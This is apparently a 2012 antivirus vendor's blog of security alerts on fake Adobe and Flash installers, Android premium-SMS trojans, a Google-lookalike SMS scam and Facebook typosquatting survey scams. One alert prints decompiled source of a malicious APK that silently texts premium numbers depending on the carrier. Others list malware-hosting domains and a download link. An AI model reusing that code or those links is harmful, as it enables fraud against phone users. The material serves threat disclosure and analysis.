[ Security Alert ]
30 July, 2012 15:16
Security Alert 2012-07-30: Fake AV Tricks Victims as Adobe Update
Last week, AegisLab found a strange domain name: hxxp://adobe-upgrade.org/w.php?f=28f52. Does it look like an official Adobe domain name ?! Actually it's not! It's registered by attacker in order to trick victim to download malicious program. After analyzing the program in depth, we found it's a fake AV. Once installed completely, it will show you the virus scaning page (Figure 1) and show how many files are infected in this computer. It's all fake but you will really get infected after the "scaning" finished :-)
VirusTotal details:
SHA256: |
e69d29b7b09449e64474b0caed08461f527b9ce1577f95f4ef3409e7424d5e36 |
SHA1: |
b0742f1f07e30620d0643029375786873d897177 |
MD5: |
4c57cf16bbe1e1f5e8e38b3773f5e07a |
File size: |
404.0 KB ( 413696 bytes ) |
File name: |
about.exe |
File type: |
Win32 EXE |
Tags: |
peexe armadillo |
Detection ratio: |
7 / 41 |
Analysis date: |
2012-07-23 05:55:56 UTC |
Figure 1: Fake virus scan page
by AegisLab
[ Security Alert ]
27 July, 2012 10:18
Security Alert 2012-07-26: Fake Adobe Flash Player Lures Android Users to Install
AegisLab discovered a fake Adobe Flash Player app in 3rd party market in Russia. Actually, it's a variant of FakeInst (aka OpFake, SMSSend or TrojanSMS) which tricks victim to download and install it, then send SMS to premium-rate number. The VirusTotal detection rate is shown as below:
SHA256: |
95781ff40529e6647f02e96e96c2f5d86a31cf9d2f02592d6b7666068925a225 |
SHA1: |
a04718f91e86ee6619f910c76509c0e16724c356 |
MD5: |
0d8d9ad5a98ce9d77462779036cf0295 |
File size: |
317.0 KB ( 324634 bytes ) |
File name: |
adobe_flash_player_v10.3.185.25_installer.apk |
File type: |
Android |
Tags: |
android |
Detection ratio: |
2 / 41 |
Analysis date: |
2012-07-26 06:47:48 UTC |
After analyzing this malicious app and check the complex hyper links inside the app in-depth, we found the following Android Markets (or websites) are all malicious, which host many malicious apks (some are normal):
- androidmir.com 和 android-mir.com (Figure 1)
- myadroidmaklet.net (
Figure 2)
- filedats.net (
Figure 3)
- file77mibi.net
- androidmarkt.ru
Figure 1: androidmir.com
Figure 2: myadroidmaklet.net
Figure 3: filedats.net
How do we find the above malicious websites? That's because one day while our WebGuard Team patrols on the Internet, the researcher finds a suspicious link to a Android APK called "Cool Reader". The link is not so simple and direct, it will redirect you to another page and jump to another site in order to evade the detection and tracking. Once you install the app completely, the fake app will issue an emergent update notification which tricks you to download another app. In the following figures, you will see the whole trick tips:
Figure 4: Cool Reader
Figure 5: fake installation process
Figure 6: fake disclaimer (can you see the notification on the upper-left corner?)
Figure 7: try to download another app
Figure 8: fake login page (just press Enter is ok)
Figure 9: lure you to link http://androidmir.com/download/cr3-0-45-07.apk (link is not existent)
Figure 10: the emergent update notification for Adobe Flash Player
Figure 11: connect to myadroidmaklet.net
While you are installing the fake Adobe Flash Player, you will see it require read/send SMS, read contact data and read GPS location permissions (Figure 12,13). Actually, normal Adobe Flash Player doesn't need such permissions.

Figure 12,13: fake Adobe Flash Player
Once the installation completed, you will find a shortcut on the desktop. After clicking, one "Browser" app will be downloaded and installed (Figure 14,15). The "Browser" app requires the same permissions as fake Adobe Flash Player (Figure 16,17).
Figure 14,15: update browser ? (just a trick)

Figure 16,17: fake Browser
Yes, this kind of attack is old-fashioned and nothing special, but Android users are always being tricked. AegidsLab reminds you that only download apps from trusted Android Markets, never click suspicious links and install AegisLab Antivirus :-)
By AegisLab
[ Security Alert ]
24 July, 2012 18:15
Security Alert 2012-07-24: Another Google Service: File Search?
AegisLab discovered a russian website called "google-file.com" which has a google style look(Figure 1). But actually it's not an official google service, it's a premium-rate SMS scam website. If you want to download some files(figure 2), you have to enter your phone number(figure 3) first and then the page will tell you to send texts to specific number in order to verify your identity(figure 4). Finally, you money will fly away(figure 5).
Figure 1: Google-File.com
Figure 2: File to download
Figure 3: Input your phone number
Figure 4: Send premium-rate SMS to specific number
Figure 5: so many complaints to google-file.com
We also found "google-fiile.mk3k.ru", "google-fille.org", and "google-fiile.org" are redirecting to Google-File.com. AegisLab WebGuard has blocked these 4 websites!
By AegisLab
[ Security Alert ]
20 July, 2012 14:33
Security Alert 2012-07-20: Analyze the 2nd stage infection (Activator.apk) of Malicious "Super Mario Bros." App
Last week, AegisLab published「Security Alert 2012-07-12: Malicious "Super Mario Bros." App in Google Play」, we mentioned that the 2nd stage infection is trying to download a apk - called "Activator.apk", the snippet code is listed as below marked as red color:
-----------------------------------------------------------------------
package com.activator;
import android.app.Activity;
import android.app.AlertDialog;
import android.app.AlertDialog.Builder;
import android.content.DialogInterface;
import android.content.DialogInterface.OnClickListener;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.telephony.TelephonyManager;
import java.util.Random;
import java.util.regex.Pattern;
public class ActivatorActivity extends Activity
{
TelephonyManager TM;
AlertDialog.Builder builder;
String operator;
private void sendSMS(String paramString1, String paramString2)
{
SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, null, null);
}
protected void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setContentView(2130903040);
this.TM = ((TelephonyManager)getSystemService("phone"));
this.operator = this.TM.getSimOperatorName();
if (Pattern.matches("[bBeEeE]*", this.operator.substring(0, 3)))
{
int k = 1 + new Random().nextInt(10000);
startProgress("1518", "DEF1773");
startProgress("3170", "4037" + k);
setResult(1);
finish();
}
while (true)
{
return;
if (Pattern.matches("[mMtTsS]*", this.operator.substring(0, 3)))
{
int j = 1 + new Random().nextInt(10000);
startProgress("770656", "DEF1773");
startProgress("3170", "4037" + j);
setResult(1);
finish();
continue;
}
if (this.operator.equalsIgnoreCase(""))
{
this.builder = new AlertDialog.Builder(this);
this.builder.setCancelable(false);
this.builder.setMessage("Ошибка при загрузке базы обоев. Попробуйте позже.");
this.builder.setNeutralButton("OK", new DialogInterface.OnClickListener()
{
public void onClick(DialogInterface paramDialogInterface, int paramInt)
{
ActivatorActivity.this.setResult(0);
ActivatorActivity.this.finish();
}
});
this.builder.create().show();
continue;
}
int i = 1 + new Random().nextInt(10000);
startProgress("3170", "4037" + i);
setResult(1);
finish();
}
}
public void startProgress(String paramString1, String paramString2)
{
new Thread(new Runnable(paramString1, paramString2)
{
public void run()
{
ActivatorActivity.this.sendSMS(this.val$number, this.val$message);
}
}).start();
}
}
-----------------------------------------------------------------------
Basically, it will send different message to different number based on different OperatorName:
operator = OperatorName()
Case1:
Pattern.matches("[bBeEeE]*", operator.substring(0, 3))
number=1518, message="DEF1773"
number=3170, message="4037" + 1~10000 (any number)
Case2:
Pattern.matches("[mMtTsS]*", operator.substring(0, 3))
number=770656, message="DEF1773"
number=3170, message="4037" + 1~10000(any number)
Case3(neither case 1 or case 2 and OperatorName is not empty)
number=3170, message="4037" + 1~10000(any number)
If operatorName is empty, a alert dialog will pop up - "Ошибка при загрузке базы обоев. Попробуйте позже." (translated by google - "Failed to load base wallpaper. Please try again later")
Because "Super Mario Bros." is masqueraded as a wallpaper app, this message just tricks you.
By AegisLab
[ Security Alert ]
12 July, 2012 17:57
Security Alert 2012-07-12: Malicious "Super Mario Bros." App in Google Play
According to Symantec and F-Secure blogs, malicious "Super Mario Bros." app appears in Google Play for several days. It looks like a action game, but after installation completed, you will see icon display "Mario HD Wallpaper" as in Figure 2. Google Play has removed this app and some related apps with the same developer, but you can find the apps in 3rd-party market as in Figure 1. This app uses 2-stage or multi-stage infection technique in order to evade Google Play review. Simply speaking, the first stage app is usually harmless, but the second stage will download some malicious contents or another malicious apk to install.
In this app(Super Mario Bros.), we found 3 links to drop box are malicious, they all point to (http://dl.dropbox.com/u/87265868/Activator.apk) !
Obviously, you can see the second stage is to download "Activator.apk" and install. After installation completed, "Activator" will be launched and send premium-rate SMS (target Eastern-Euorpean area) and finally un-install itself.
Figure 1: We discovered it on 3rd-party market.
Figure 2: "Mario HD Wallpaper"
Figure 3: Russian disclaimer
Figure 4: Russian disclaimer
Figure 5: AegisLab Antivirus detected
VirusTotal detection rate:
According to the developer information, AegisLab discovered 5 related apps with the same developer and AegisLab Antivirus can detect them all.
By AegisLab
[ Security Alert ]
12 July, 2012 13:55
Security Alert 2012-07-12: Facebook URL Hijacking (updated)
Remember the security alert we published before:「Security Alert 2012-05-29: Facebook URL Hijacking」, AegisLab discovered the website style in facenook.com and facevook.com look more similar as FB official website as in Figure 1.
Figure 1: Look so similar as Facebook style
Once you get into the page, you will hear the recording voice as follows:
"You have been selected to take part in our anonymous survey!
Complete this 30 second questionnaire, and to say "thank you", we'll offer you an exclusive gift."
Click the "Start" button and then fill-in the answer:
Figure 2: Answer the questions
After answering the all 5 questions, Best Buy and Walmart Gift Card win-prize page will pop-up as in Figure 3. (Don't even think about it, you'll never win the prize!)
Figure 3: Choose the gift card
After choosing the gift card you want, you have to input the cell phone number and e-mail address as in Figure 4. (OMG! Don't do that!)
Figure 4: Fill-in cell phone number and e-mail address
Congratulation! You have finished the questionnaire but all in vain, except leaking your sensitive information. (and will get more spam :-) )
By AegsiLab